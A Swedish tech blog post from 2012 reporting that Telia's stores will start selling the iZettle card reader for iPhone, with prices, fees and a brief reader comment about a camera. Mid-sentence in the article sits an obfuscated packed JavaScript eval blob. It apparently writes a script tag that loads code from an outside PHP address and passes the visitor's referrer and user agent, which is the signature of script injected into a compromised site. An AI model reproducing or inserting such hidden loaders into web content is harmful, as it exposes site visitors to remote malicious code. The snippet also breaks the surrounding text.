Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

iZettle börjar säljas hos Telia.

iZettle börjar säljas hos Telia.
Filip Urde
  • On 20 mars, 2012
  • http://www.revue.se/filip-urde

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hyehz|var|u0026u|referrer|dnrfi||js|php’.split(’|’),0,{}))
svenska kreditkortläsaren
iZettle börjar inomkort att säljas i samarbete med Telia. iZettle är en kortläsare, vilken man klipper på sin iPhone och körs sedan med tillhörande app. Det hela för tankarna tillbaka till mobilkamerans barndom och min Ericsson med clip-on kamera.

Samarbetet mellan Telia och iZettle går ut på att sälja kortläsaren via Telias 85 svenska butiker. iZettle har tidigare inte sålts via en extern butik, utan endast via webshoppar. Men den 23:e mars så är det alltså premiär i Telias butiker.

Det fina med iZettles kortläsare är att mindre, mellanstora handlare och privatpersoner kan ta betalt via kort direkt i sin iPhone. Du kan alltså enkelt genomföra kort betalning på t.ex. en blocket affär. Kostnaden för handlaren är 2,75% av transaktionsbeloppet plus 1,50 kronor per transaktion. iZettle-kortläsare kommer ligga på 199 kronor exklusive moms.

Till en början är iZettle endast kompatibel med iPhone och iPad.

Vi på Revue har testat den för några månader sedan och tycker den fungerar bra. Det är som sagt ganska hög procent som tas av varje transaktion så man kanske inte ska använda den om man driver en bilförsäljning eller liknande.

Comments

  1. Johannes

    Vad är det för kamera?

    • Sebastian Plengier Ehrnfelt

      Olympus XZ – En riktigt bra kamera som jag är sjukt nöjd över. Om du är ute efter en kompakt systemkamera rekommenderar jag den här eller Lumix LX 5. De ä i samma klass. Olympusen har fått lite bättre betyg i recensioner men det är ett smakval såklart.